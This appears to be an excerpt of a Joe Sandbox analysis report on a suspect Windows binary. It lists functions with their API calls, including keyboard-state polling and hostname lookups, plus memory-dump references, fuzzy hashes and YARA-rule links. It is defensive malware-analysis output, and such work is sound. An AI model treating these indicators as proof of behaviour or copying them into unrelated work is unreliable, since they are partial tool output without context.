                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1246142700-0
                                                                                                                  • Opcode ID: 883c427a67aa10de586c6ba54bf264bbf5cc73b49d95279da45f4e5c6487471a
                                                                                                                  • Instruction ID: 9833d0957f895ebc24604da01cdb50a573708fd9a41049effcecac07c9efcb36
                                                                                                                  • Opcode Fuzzy Hash: 883c427a67aa10de586c6ba54bf264bbf5cc73b49d95279da45f4e5c6487471a
                                                                                                                  • Instruction Fuzzy Hash: 7DB1F874A00208AFDB14EFA5D898DAEBBF9FF48314F148469E905EB251DB70ED45CB60
                                                                                                                  Function 00E22E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00E22ED6
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00E22F41
                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00E22F61
                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00E22F78
                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00E22FA7
                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00E22FB8
                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00E22FE4
                                                                                                                  • GetKeyState.USER32(00000011), ref: 00E22FF2
                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00E2301B
                                                                                                                  • GetKeyState.USER32(00000012), ref: 00E23029
                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00E23052
                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00E23060
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 541375521-0
                                                                                                                  • Opcode ID: 5dbbf8010dfbbb172e0caf30cc6a14adf1b54819f699a0b1d0454624440614e3
                                                                                                                  • Instruction ID: 1a26a007033b6915c050ac505ddebd0c844d34478dd29ba65ed6e850b42786ba
                                                                                                                  • Opcode Fuzzy Hash: 5dbbf8010dfbbb172e0caf30cc6a14adf1b54819f699a0b1d0454624440614e3
                                                                                                                  • Instruction Fuzzy Hash: 8E510B60A047E839FB35DB70A800BEABFF45F11348F08559DD6C27A1C2DA949B4CCB62
                                                                                                                  Function 00E1ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00E1ED1E
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00E1ED30
                                                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E1ED8E
                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00E1ED99
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00E1EDAB
                                                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E1EE01
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00E1EE0F
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00E1EE20
                                                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E1EE63
                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00E1EE71
                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E1EE8E
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00E1EE9B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3096461208-0
                                                                                                                  • Opcode ID: 12907117f9ec9c18b5cea48e636e83c0ecd0216595f1469936d86e235e3a3686
                                                                                                                  • Instruction ID: 6bbbb77bf422cdddb1dd86e877c6797670feea8f756e94c2f8ea64054f59c4b0
                                                                                                                  • Opcode Fuzzy Hash: 12907117f9ec9c18b5cea48e636e83c0ecd0216595f1469936d86e235e3a3686
                                                                                                                  • Instruction Fuzzy Hash: 7B513571B00205AFDB18CF79DD85AAEBBB9FB88744F54812DF91AE7290D7B09D448B10
                                                                                                                  Function 00DFB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DFB526: GetWindowLongW.USER32(?,000000EB), ref: 00DFB537
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00DFB438
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ColorLongWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 259745315-0
                                                                                                                  • Opcode ID: 0bec827b44611b9a8e2a509eb95632febe0d1490381ca1cfedc0c2d52cafd030
                                                                                                                  • Instruction ID: 3171c689383b693c59b19b96b917c9a308b42ff62ff6eceb3b5b3a4f99b48f8e
                                                                                                                  • Opcode Fuzzy Hash: 0bec827b44611b9a8e2a509eb95632febe0d1490381ca1cfedc0c2d52cafd030
                                                                                                                  • Instruction Fuzzy Hash: 6741F3305055089FCB205F28ED89BB93B65EB46379F59C262FEA59E1E2C7708C45CB31
                                                                                                                  Function 00E2690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 136442275-0
                                                                                                                  • Opcode ID: ea085f56d319c7c4f21f180a4dad751b8a6efb3f94ca12ffa3213dea44aad94a
                                                                                                                  • Instruction ID: 4e9c98f891047929d7c56a78a8ba67503102af2919648fb50e1ad8e32711e795
                                                                                                                  • Opcode Fuzzy Hash: ea085f56d319c7c4f21f180a4dad751b8a6efb3f94ca12ffa3213dea44aad94a
                                                                                                                  • Instruction Fuzzy Hash: 18411EB684512CAFDF65DB94DC85DDFB3BCEB44300F0051A6B659B6091EA30ABE48F50
                                                                                                                  Function 00E2D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CharLowerBuffW.USER32(00E7DC00,00E7DC00,00E7DC00), ref: 00E2D7CE
                                                                                                                  • GetDriveTypeW.KERNEL32(?,00E93A70,00000061), ref: 00E2D898
                                                                                                                  • _wcscpy.LIBCMT ref: 00E2D8C2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                  • API String ID: 2820617543-1000479233
                                                                                                                  • Opcode ID: cac3e4d684fd79a4fed71501e750ec9bbf43a92e6bda47c351e899521ba06000
                                                                                                                  • Instruction ID: b95f238a155d432602e467ac3e40d12b41e8674b6cef981a65cb766999c55e08
                                                                                                                  • Opcode Fuzzy Hash: cac3e4d684fd79a4fed71501e750ec9bbf43a92e6bda47c351e899521ba06000
                                                                                                                  • Instruction Fuzzy Hash: 9051C7311083449FC708EF14EC82AAFB7A5EF84314F14992DFA99672A2DB71DD05CB62
                                                                                                                  Function 00DE936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __swprintf.LIBCMT ref: 00DE93AB
                                                                                                                  • __itow.LIBCMT ref: 00DE93DF
                                                                                                                    • Part of subcall function 00E01557: _xtow@16.LIBCMT ref: 00E01578
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __itow__swprintf_xtow@16
                                                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                                                  • API String ID: 1502193981-2263619337
                                                                                                                  • Opcode ID: 7ed462a906c9f7c5e5da474ac778ac807c68cb8ed11d65ef28cee174e2c4b917
                                                                                                                  • Instruction ID: 20cda53052a0d1a067e6a02266baeacc669a1ccbe26393aded317dbfc7253c1a
                                                                                                                  • Opcode Fuzzy Hash: 7ed462a906c9f7c5e5da474ac778ac807c68cb8ed11d65ef28cee174e2c4b917
                                                                                                                  • Instruction Fuzzy Hash: 5341FBB15052049BEB24EF75D951E79F3E4EF84308F24586EE549E71C1EA31D985CB30
                                                                                                                  Function 00E4A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E4A259
                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00E4A260
                                                                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E4A273
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00E4A27B
                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E4A286
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00E4A28F
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00E4A299
                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E4A2AD
                                                                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E4A2B9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                  • String ID: static
                                                                                                                  • API String ID: 2559357485-2160076837
                                                                                                                  • Opcode ID: 6129b629cd37eec73d0cec50ebcdcac776419ea3cc1e2947657934f9bff41d4d
                                                                                                                  • Instruction ID: c142c580ad7d7b04e6148fbb3ea63ca19298ca4d2129f443eb1b97151741796f
                                                                                                                  • Opcode Fuzzy Hash: 6129b629cd37eec73d0cec50ebcdcac776419ea3cc1e2947657934f9bff41d4d
                                                                                                                  • Instruction Fuzzy Hash: 35318B31645215AFDB115FA5EC09FEB3B69FF0E3A4F140224FA19B21A0C7B1D811DBA4
                                                                                                                  Function 00E26F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                  • String ID: 0.0.0.0
                                                                                                                  • API String ID: 2620052-3771769585
                                                                                                                  • Opcode ID: 02a87938e8e1dc0a8d843ec0ad190cc959e74f5d56be49d08d1ffb13869109ef
                                                                                                                  • Instruction ID: ea40134f161296a0f9ce25727f2d0ef186d0d07c8c0693ac6d73448ac503991c
                                                                                                                  • Opcode Fuzzy Hash: 02a87938e8e1dc0a8d843ec0ad190cc959e74f5d56be49d08d1ffb13869109ef
                                                                                                                  • Instruction Fuzzy Hash: 18112732A08228AFDF14AB71BD4AEDA77ACEF00714F011166F105B6080EFB0EA848661
                                                                                                                  Function 00E0500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E05047
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  • __gmtime64_s.LIBCMT ref: 00E050E0
                                                                                                                  • __gmtime64_s.LIBCMT ref: 00E05116
                                                                                                                  • __gmtime64_s.LIBCMT ref: 00E05133
                                                                                                                  • __allrem.LIBCMT ref: 00E05189
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E051A5
                                                                                                                  • __allrem.LIBCMT ref: 00E051BC
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E051DA
                                                                                                                  • __allrem.LIBCMT ref: 00E051F1
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E0520F
                                                                                                                  • __invoke_watson.LIBCMT ref: 00E05280
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 384356119-0
                                                                                                                  • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                  • Instruction ID: be9a6410362df141204b8e564572d94e762da61081f325f0a1f0dfd99aaf85c5
                                                                                                                  • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                                                  • Instruction Fuzzy Hash: F171A473A01B16ABE714AE68CC41BABB3F9AF54764F14522AE510F62C1E770D9C08FD0
                                                                                                                  Function 00E24DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E24DF8
                                                                                                                  • GetMenuItemInfoW.USER32(00EA1708,000000FF,00000000,00000030), ref: 00E24E59
                                                                                                                  • SetMenuItemInfoW.USER32(00EA1708,00000004,00000000,00000030), ref: 00E24E8F
                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00E24EA1
                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00E24EE5
                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00E24F01
                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00E24F2B
                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00E24F70
                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E24FB6
                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E24FCA
                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E24FEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4176008265-0
                                                                                                                  • Opcode ID: 59a3f14b1ca42c03bfd55125765a4d65475fca9c6e7ed3a0b57a2eee4150191c
                                                                                                                  • Instruction ID: 8de86c9555ff1395c4a58c512622af421606943c2cab5f97d21df95138a44e4d
                                                                                                                  • Opcode Fuzzy Hash: 59a3f14b1ca42c03bfd55125765a4d65475fca9c6e7ed3a0b57a2eee4150191c
                                                                                                                  • Instruction Fuzzy Hash: 6261A1B1A00269EFEB11CF64EE84AAE7BB8FB45348F152059F442B7291D771AD04CB20
                                                                                                                  Function 00E194E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00E194FE
                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00E19549
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00E1955B
                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E1957B
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00E195BE
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E195D2
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00E195E7
                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00E195F4
                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E195FD
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00E1960F
                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E1961A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2706829360-0
                                                                                                                  • Opcode ID: afb53370047c70f2e63947061c4eb92be229ff8df43ac2c9c7203c7f79756d07
                                                                                                                  • Instruction ID: 6da1b94900375f57305e7ae5fdc87f3d69ab4dc58256ab207f66c2da225dd320
                                                                                                                  • Opcode Fuzzy Hash: afb53370047c70f2e63947061c4eb92be229ff8df43ac2c9c7203c7f79756d07
                                                                                                                  • Instruction Fuzzy Hash: 10413071E00219AFCB01DFA5DC589EEBBB9FF08354F408065E511B7251DB70AA85CBA1
                                                                                                                  Function 00E3BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
